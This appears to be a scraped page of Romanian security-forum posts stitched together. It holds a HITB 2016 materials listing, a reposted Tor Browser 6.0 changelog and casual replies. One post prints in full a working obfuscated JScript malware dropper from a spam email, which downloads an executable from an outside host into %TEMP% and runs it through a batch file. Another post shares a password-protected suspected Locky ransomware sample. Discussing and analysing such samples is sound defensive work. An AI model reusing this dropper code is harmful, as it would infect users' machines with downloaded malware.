Escape.pdf 2016-05-27 15:37 1.9M D2T2 - Wish Wu - Perf - From Profiling to Kernel Exploiting.pdf 2016-05-27 15:06 315K D2T3 LABS - Matteo Beccaro - Electronic Access Control Security.pdf 2016-05-27 16:11 13M KEYNOTE 1 - John Adams - Beyond FBI v Apple.pdf 2016-05-26 09:40 6.4M KEYNOTE 2 - Adam Laurie - The Future Has Arrived and it's Effin Hilarious.odp 2016-05-27 10:47 281M Whitepapers/ 2016-05-27 18:40 - Felicitari Radu Caragea @ Bitdefender - https://conference.hitb.org/hitbsecconf2016ams/materials/D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf

or Browser 6.0 is released Posted May 30th, 2016 by gk The Tor Browser Team is proud to announce the first stable release in the 6.0 series. This release is available from the Tor Browser Project page and also from our distribution directory. This release brings us up to date with Firefox 45-ESR, which should mean a better support for HTML5 video on Youtube, as well as a host of other improvements. Beginning with the 6.0 series code-signing for OS X systems is introduced. This should help our users who had trouble with getting Tor Browser to work on their Mac due to Gatekeeper interference. There were bundle layout changes necessary to adhere to code signing requirements but the transition to the new Tor Browser layout on disk should go smoothly. The release also features new privacy enhancements and disables features where we either did not have the time to write a proper fix or where we decided they are rather potentially harmful in a Tor Browser context. On the security side this release makes sure that SHA1 certificate support is disabledand our updater is not only relying on the signature alone but is checking the hash of the downloaded update file as well before applying it. Moreover, we provide a fix for a Windows installer related DLL hijacking vulnerability. A note on our search engine situation: Lately, we got a couple of comments on our blog and via email wondering why we are now using DuckDuckGo as the default search engine and not Disconnect anymore. Well, we still use Disconnect. But for a while now Disconnect has no access to Google search results anymore which we used in Tor Browser. Disconnect being more a meta search engine which allows users to choose between different search providers fell back to delivering Bing search results which were basically unacceptable quality-wise. While Disconnect is still trying to fix the situation we asked them to change the fallback to DuckDuckGo as their search results are strictly better than the ones Bing delivers. The full changelog since Tor Browser 5.5.5 is: Tor Browser 6.0 -- May 30 All Platforms Update Firefox to 45.1.1esr Update OpenSSL to 1.0.1t Update Torbutton to 1.9.5.4 Bug 18466: Make Torbutton compatible with Firefox ESR 45 Bug 18743: Pref to hide 'Sign in to Sync' button in hamburger menu Bug 18905: Hide unusable items from help menu Bug 16017: Allow users to more easily set a non-tor SSH proxy Bug 17599: Provide shortcuts for New Identity and New Circuit Translation updates Code clean-up Update Tor Launcher to 0.2.9.3 Bug 13252: Do not store data in the application bundle Bug 18947: Tor Browser is not starting on OS X if put into /Applications Bug 11773: Setup wizard UI flow improvements Translation updates Update HTTPS-Everywhere to 5.1.9 Update meek to 0.22 (tag 0.22-18371-3) Bug 18371: Symlinks are incompatible with Gatekeeper signing Bug 18904: Mac OS: meek-http-helper profile not updated Bug 15197 and child tickets: Rebase Tor Browser patches to ESR 45 Bug 18900: Fix broken updater on Linux Bug 19121: The update.xml hash should get checked during update Bug 18042: Disable SHA1 certificate support Bug 18821: Disable libmdns support for desktop and mobile Bug 18848: Disable additional welcome URL shown on first start Bug 14970: Exempt our extensions from signing requirement Bug 16328: Disable MediaDevices.enumerateDevices Bug 16673: Disable HTTP Alternative-Services Bug 17167: Disable Mozilla's tracking protection Bug 18603: Disable performance-based WebGL fingerprinting option Bug 18738: Disable Selfsupport and Unified Telemetry Bug 18799: Disable Network Tickler Bug 18800: Remove DNS lookup in lockfile code Bug 18801: Disable dom.push preferences Bug 18802: Remove the JS-based Flash VM (Shumway) Bug 18863: Disable MozTCPSocket explicitly Bug 15640: Place Canvas MediaStream behind site permission Bug 16326: Verify cache isolation for Request and Fetch APIs Bug 18741: Fix OCSP and favicon isolation for ESR 45 Bug 16998: Disable <link rel="preconnect"> for now Bug 18898: Exempt the meek extension from the signing requirement as well Bug 18899: Don't copy Torbutton, TorLauncher, etc. into meek profile Bug 18890: Test importScripts() for cache and network isolation Bug 18886: Hide pocket menu items when Pocket is disabled Bug 18703: Fix circuit isolation issues on Page Info dialog Bug 19115: Tor Browser should not fall back to Bing as its search engine Bug 18915+19065: Use our search plugins in localized builds Bug 19176: Zip our language packs deterministically Bug 18811: Fix first-party isolation for blobs URLs in Workers Bug 18950: Disable or audit Reader View Bug 18886: Remove Pocket Bug 18619: Tor Browser reports "InvalidStateError" in browser console Bug 18945: Disable monitoring the connected state of Tor Browser users Bug 18855: Don't show error after add-on directory clean-up Bug 18885: Disable the option of logging TLS/SSL key material Bug 18770: SVGs should not show up on Page Info dialog when disabled Bug 18958: Spoof screen.orientation values Bug 19047: Disable Heartbeat prompts Bug 18914: Use English-only label in <isindex/> tags Bug 18996: Investigate server logging in esr45-based Tor Browser Bug 17790: Add unit tests for keyboard fingerprinting defenses Bug 18995: Regression test to ensure CacheStorage is disabled Bug 18912: Add automated tests for updater cert pinning Bug 16728: Add test cases for favicon isolation Bug 18976: Remove some FTE bridges Windows Bug 13419: Support ICU in Windows builds Bug 16874: Fix broken https://sports.yahoo.com/dailyfantasy page Bug 18767: Context menu is broken on Windows in ESR 45 based Tor Browser OS X Bug 6540: Support OS X Gatekeeper Bug 13252: Tor Browser should not store data in the application bundle Bug 18951: HTTPS-E is missing after update Bug 18904: meek-http-helper profile not updated Bug 18928: Upgrade is not smooth (requires another restart) Build System All Platforms Bug 18127: Add LXC support for building with Debian guest VMs Bug 16224: Don't use BUILD_HOSTNAME anymore in Firefox builds Bug 18919: Remove unused keys and unused dependencies Windows Bug 17895: Use NSIS 2.51 for installer to avoid DLL hijacking Bug 18290: Bump mingw-w64 commit we use OS X Bug 18331: Update toolchain for Firefox 45 ESR Bug 18690: Switch to Debian Wheezy guest VMs Linux Bug 18699: Stripping fails due to obsolete Browser/components directory Bug 18698: Include libgconf2-dev for our Linux builds Bug 15578: Switch to Debian Wheezy guest VMs (10.04 LTS is EOL) gk's blog Sursa: https://blog.torproject.org/blog/tor-browser-60-released

Depinde de experienta. Sunt la fel ca in programare.

Pentest cu o mana pe mouse si una in pantaloni.

Salut, Am mai primit un email cu un JS intr-un ZIP. E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii. In fine, JS-ul e urmatorul: var WARRANTIES0 = false; var mousemove0 = ""; var code; var delts = "C" + "r"+"e"+"ateObject"; /*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */ mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */ code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); B12F40 = "A"+"DODB"; mousemove1 = "s" + "end"; dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; /* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */ if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3; var Amount0 = 1 * (2 - 0); var countRemain = Amount0 - ((1 * 2) + 0) * 1; function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);}; function cir(){return delts;}; { var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; var delay = ""; delay = "o"+"pen"; function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;}; if (true){ penetration1 = code0; cos1 = Summary[delts](penetration1); var WARRANTIES = 3-2; do { for (;WARRANTIES;){ try { if (WARRANTIES == 1) { cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); cos1[mousemove1](); cos0 = "S"+"l"+"eep"; WARRANTIES = 2; } Summary[cos0](120); if (cos1["r"+"eadystate"] < 2 * 2) continue; WARRANTIES = countRemain; function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e"; countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; objref0 = "start "+FFFFF0+"\r\nexit" penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"](objref0); directionally1[objref] = 1 * 0; penetration1[directionally0](countRemain0, 2 * 1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"]("M"); directionally1[objref] = 0; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 1 * 1; penetration1[Amount](cos1[code]); directionally1[objref] = 1; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); if (1 && WARRANTIES0) directionally(countRemain0); } catch(cir0){};}; }while (WARRANTIES); } } E "obfuscat" cu pula dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; Ma intreb ce nationalitate o avea autorul: if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } Haideti baietii, puteti mai mult!

Attention! This is ransomware/malware/virus! Do NOT download! Salut, Am primit azi un mail cu un fisier Word macro enabled (.docm). Nu am avut timp sa ma uit peste el, dar pare Locky Ransomware. L-am scanat pe virustotal: https://virustotal.com/en/file/316d5366c4720c8be340088836d200866cea471ce01375314b48c36fbf593c70/analysis/1463064016/ Se pot vedea acolo macro-urile obfuscate. Parola arhiva: infected_rst Pentru cei care nu stiu despre ce este vorba, dar fi mai ok sa NU il descarcati. MalwareSample.zip

Evitati offtopic. Este un open redirect la urma urmei. L-am raportat celor de la IPB, astept un raspuns.

Deci: Folositi Chrome cu Tor, nu acel Firefox de cacat.